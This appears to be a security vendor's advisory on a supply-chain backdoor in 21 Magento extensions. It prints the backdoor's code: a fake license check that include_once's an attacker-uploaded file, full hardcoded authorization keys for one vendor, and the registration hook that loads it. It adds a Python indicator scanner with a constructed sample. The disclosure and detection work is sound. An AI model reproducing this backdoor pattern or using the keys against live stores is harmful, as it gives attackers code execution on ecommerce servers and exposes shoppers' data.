Backdoor found in popular ecommerce components

by Sansec Forensics Team

Published in Threat Research − May 01, 2025

Multiple vendors were hacked in a coordinated supply chain attack; Sansec found 21 applications with the same backdoor. Curiously, the malware was injected 6 years ago but only came to life this week, when attackers took full control of ecommerce servers. Sansec estimates that between 500 and 1000 stores are running backdoored software.

Hundreds of stores, including a $40 billion multinational, are running backdoored versions of popular ecommerce software. We found that the backdoor has been actively used since at least April 20th. Sansec identified these backdoors in the following packages, which were published between 2019 and 2022.

Vendor      Package
Tigren      Ajaxsuite
Tigren      Ajaxcart
Tigren      Ajaxlogin
Tigren      Ajaxcompare
Tigren      Ajaxwishlist
Tigren      MultiCOD
Meetanshi   ImageClean
Meetanshi   CookieNotice
Meetanshi   Flatshipping
Meetanshi   FacebookChat
Meetanshi   CurrencySwitcher
Meetanshi   DeferJS
MGS         Lookbook
MGS         StoreLocator
MGS         Brand
MGS         GDPR
MGS         Portfolio
MGS         Popup
MGS         DeliveryTime
MGS         ProductTabs
MGS         Blog

We established that Tigren, Magesolution (MGS) and Meetanshi servers have been breached and that attackers were able to inject backdoors on their download servers.

This kind of hack is called a Supply Chain Attack, and it is one of the worst types: by hacking these vendors, the attacker gained access to all of their customers' stores, and by proxy to every shopper who visits those stores.

We also found a backdoored version of the Weltpixel GoogleTagManager extension, but we have not been able to establish whether Weltpixel or these particular stores got compromised.

Check your store now

If you use software from these vendors, you should check your store now. The backdoor consists of a fake license check in a file called License.php or LicenseApi.php.

The evil is in the adminLoadLicense function, which executes $licenseFile as PHP.

protected function adminLoadLicense($licenseFile)
{
    // ...
    // include_once() evaluates whatever file $licenseFile points to as PHP
    $data = include_once($licenseFile);
    // ...
}

The $licenseFile can be controlled by the attacker using the adminUploadLicense function. In versions from 2019 this does not require any authentication. In later versions this requires a secret key that must match the hardcoded checksum and salt:

class License {

    // Hardcoded checksum and salt that an uploaded key must match (per vendor)
    const SECURE_KEY = '83ba291cd9201e9a28173741bac82745';
    const SIGN_KEY   = 'afa3a778bd34181c44f2dfe1de8aff05';

    // ...
}

The fake license check is explicitly activated via registration.php.

<?php
\Magento\Framework\Component\ComponentRegistrar::register(
    \Magento\Framework\Component\ComponentRegistrar::MODULE,
    'Meetanshi_CookieNotice',
    __DIR__
);
if (file_exists(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php')) {
    include_once(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php');
}

The backdoor code is the same in all the packages we found, except for:

  • The authorization checksum (unique per vendor)
  • The backdoor path (unique per module)
  • The license filename (unique per vendor)

Vendor            Meetanshi     MGS           Tigren        Weltpixel
Secure Key        05aafe4...    83ba291...    e7c057dd...   47946a7...
Sign Key          f31d647...    afa3a77...    313bedf...    52dd8df...
License Filename  mtn-license   mgs-license   apj-license   wlp-license
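The checks described under "Check your store now" (a License.php or LicenseApi.php whose adminLoadLicense includes an uploaded file, an adminUploadLicense handler, the hardcoded key constants, and a registration.php that include_once's the License file) can be turned into a simple file-system indicator scan. The script below is an added example written for this post; it is not Sansec's eComscan and not code from any of the vendors named above. It assumes only the indicators quoted in this post: the two full MGS keys and the truncated key prefixes from the table (matched as prefixes), the four license filenames, and the function names. The backdoored module it writes into a temporary directory is constructed for the demonstration and is not a real vendor package.

```python
"""Indicator scan for the fake-license backdoor described in this post.

Added example (not eComscan, not vendor code). Walks a Magento code tree and
reports files that carry the indicators quoted in the post.
"""
import os
import re
import tempfile

# Key material quoted in the post. The MGS keys are given in full; the others
# are truncated in the table, so every value is matched as a prefix.
KEY_PREFIXES = {
    "Meetanshi": ("05aafe4", "f31d647"),
    "MGS": ("83ba291cd9201e9a28173741bac82745", "afa3a778bd34181c44f2dfe1de8aff05"),
    "Tigren": ("e7c057dd", "313bedf"),
    "Weltpixel": ("47946a7", "52dd8df"),
}
LICENSE_FILENAMES = ("mtn-license", "mgs-license", "apj-license", "wlp-license")

RE_LOAD = re.compile(r"function\s+adminLoadLicense\s*\(")
RE_UPLOAD = re.compile(r"function\s+adminUploadLicense\s*\(")
# include/require of a variable path: the code-execution primitive
RE_DYN_INCLUDE = re.compile(r"\b(include_once|require_once|include|require)\s*\(?\s*\$")
RE_CONST = re.compile(r"const\s+(SECURE_KEY|SIGN_KEY)\s*=\s*'([0-9a-f]+)'")
RE_REG_INCLUDE = re.compile(r"include_once\s*\(.*License(?:Api)?\.php")


def scan_file(path):
    """Return the list of indicator descriptions found in one PHP file."""
    findings = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    except OSError:
        return findings
    name = os.path.basename(path)
    if name in ("License.php", "LicenseApi.php"):
        if RE_LOAD.search(src) and RE_DYN_INCLUDE.search(src):
            findings.append("adminLoadLicense includes a variable path (code execution)")
        if RE_UPLOAD.search(src):
            findings.append("adminUploadLicense handler present")
        for const, value in RE_CONST.findall(src):
            for vendor, prefixes in KEY_PREFIXES.items():
                if any(value.startswith(p) for p in prefixes):
                    findings.append(f"{const} matches known {vendor} backdoor key")
        for fname in LICENSE_FILENAMES:
            if fname in src:
                findings.append(f"references license filename {fname}")
    elif name == "registration.php" and RE_REG_INCLUDE.search(src):
        findings.append("registration.php include_once's a License file")
    return findings


def scan_tree(root):
    """Walk a code tree; return {relative path: [indicators]} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            if f.endswith(".php"):
                p = os.path.join(dirpath, f)
                hits = scan_file(p)
                if hits:
                    report[os.path.relpath(p, root)] = hits
    return report


def build_sample_tree(root):
    """Write a constructed backdoored module plus a clean one under root (test data only)."""
    mod = os.path.join(root, "app", "code", "Vendor", "Module")
    lic_dir = os.path.join(mod, "Model", "System", "Config", "Source", "Box", "License")
    os.makedirs(lic_dir)
    with open(os.path.join(lic_dir, "License.php"), "w") as fh:
        fh.write(r"""<?php
class License {
    const SECURE_KEY = '83ba291cd9201e9a28173741bac82745';
    const SIGN_KEY   = 'afa3a778bd34181c44f2dfe1de8aff05';
    const LICENSE_FILE = 'mgs-license';
    protected function adminUploadLicense($request) { /* constructed stub */ }
    protected function adminLoadLicense($licenseFile)
    {
        $data = include_once($licenseFile);
    }
}
""")
    with open(os.path.join(mod, "registration.php"), "w") as fh:
        fh.write(r"""<?php
\Magento\Framework\Component\ComponentRegistrar::register(
    \Magento\Framework\Component\ComponentRegistrar::MODULE, 'Vendor_Module', __DIR__);
if (file_exists(__DIR__ . '/Model/System/Config/Source/Box/License/License.php')) {
    include_once(__DIR__ . '/Model/System/Config/Source/Box/License/License.php');
}
""")
    clean = os.path.join(root, "app", "code", "Vendor", "Clean")
    os.makedirs(clean)
    with open(os.path.join(clean, "registration.php"), "w") as fh:
        fh.write("<?php\n// constructed clean module: nothing suspicious here\n")


def demo():
    """Scan the constructed tree in a temp dir and return the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path)
        for h in hits:
            print("   -", h)
```

To run it against a real store, call scan_tree() with the Magento root instead of demo(); a hit on adminLoadLicense plus a dynamic include is the strongest signal, while a key-prefix match ties the file to a specific vendor's backdoor variant. Because the file path is unique per module, scanning by content rather than by path is what catches all 21 packages.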

Recommendations

Sansec’s eComscan detects this malware out of the box. If you find a backdoor on your store, you can safely remove the fake License file. If you still have the original source in a zip file (particularly WeltPixel), please share it with us for further analysis.

At this point, we recommend being extremely cautious when using software from these vendors.

Vendor responses

Magesolution (MGS) did not respond, but the backdoored packages can still be downloaded from their site as of Apr 30th.

Tigren denies having been hacked, but the backdoored packages are still available on their site as of Apr 30th.

Meetanshi claims that their software has not been tampered with, but confirmed that their server got hacked.

Further research

It is rare for a backdoor to remain undetected for 6 years, but it is even stranger that actual abuse has only started now.

We will update this post when we learn more.

Need help or want a second opinion? Get in touch.

Credits

Special thanks to Alexandra Zota for discovering the initial abuse.
